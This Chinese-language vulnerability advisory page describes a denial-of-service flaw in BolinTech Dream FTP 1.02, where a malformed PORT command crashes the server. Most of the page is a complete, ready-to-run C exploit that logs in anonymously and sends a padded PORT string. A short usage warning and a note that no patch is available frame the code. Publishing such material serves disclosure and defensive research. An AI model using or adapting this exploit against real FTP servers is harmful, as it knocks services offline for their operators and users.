发布日期：2006-12-21
更新日期：2006-12-25

受影响系统：

BolinTech Dream FTP 1.02

描述：

---

BUGTRAQ  ID: 21700

Dream FTP Server是一款多线程的ftp服务器。

Dream FTP Server在处理用户请求时存在漏洞，远程攻击者可能利用此漏洞对服务器执行拒绝服务攻击。

远程攻击者可以通过向Dream FTP Server发送带有无效参数的PORT命令导致拒绝服务。

<*来源：InTeL
  
  链接：http://secunia.com/advisories/23471/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default
which enables anyone to crash the server at will.
But if the anonymous logins have been disabled try it with
a another user/pass account

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


int usage(char *filename)
{
       printf("Dream FTP v1.02 DoS exploit\r\n");
       printf("By InTeL\r\n");
       printf("USAGE: %s <IP_Address> <port>\r\n", filename);

    exit(0);
}

int main(int argc, char *argv[])
{
    char evilbuf[40], recvbuf[1028];
    unsigned short port;
    struct sockaddr_in saddr;
    struct hostent *he;
    WSADATA wsaData;
    SOCKET sock;

    if(argc != 3)
        usage(argv[0]);

    port = atoi(argv[2]);    
    if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
        printf("Unable to initialize Winsock \n");
        exit(1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
        printf("Socket Error \n");
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL){  
        printf("Couldnt Resolve %s \n",argv[1]);
        exit(1);
    }

    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    saddr.sin_addr = *((struct in_addr *)he->h_addr);    
    saddr.sin_port = htons(port);

    if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
        printf("Connect Error \n");
          exit(1);
    }

    for(int i = 0; i<3;i++){
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }
    printf("Logging in\r\n");    

    memset(evilbuf, 0,sizeof(evilbuf));
    strcpy(evilbuf, "USER Anonymous\r\n"); //USER
    send (sock, evilbuf, strlen(evilbuf), 0);
  
    for(i=0;i<4;i++){
        memset(recvbuf,0,sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
       }
  
    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
    send (sock, evilbuf, strlen(evilbuf), 0);

    for(i=0; i<3;i++) {
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
       }
    printf("Building overflow string\r\n");

    memset(evilbuf,0,sizeof(evilbuf));
    strcpy(evilbuf, "PORT ");  //PORT
    for(i = 5;i != 36;i++)
        evilbuf[i] = 'A';
       strcat(evilbuf,"\r\n");
    
    send (sock, evilbuf, strlen(evilbuf), 0);  
  
    printf("DoS Attack Done\r\n");
    closesocket(sock);

    return 0;
}

建议：

---

厂商补丁：

BolinTech
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.bolintech.com/index.htm

浏览次数：3814
严重程度：0（网友投票）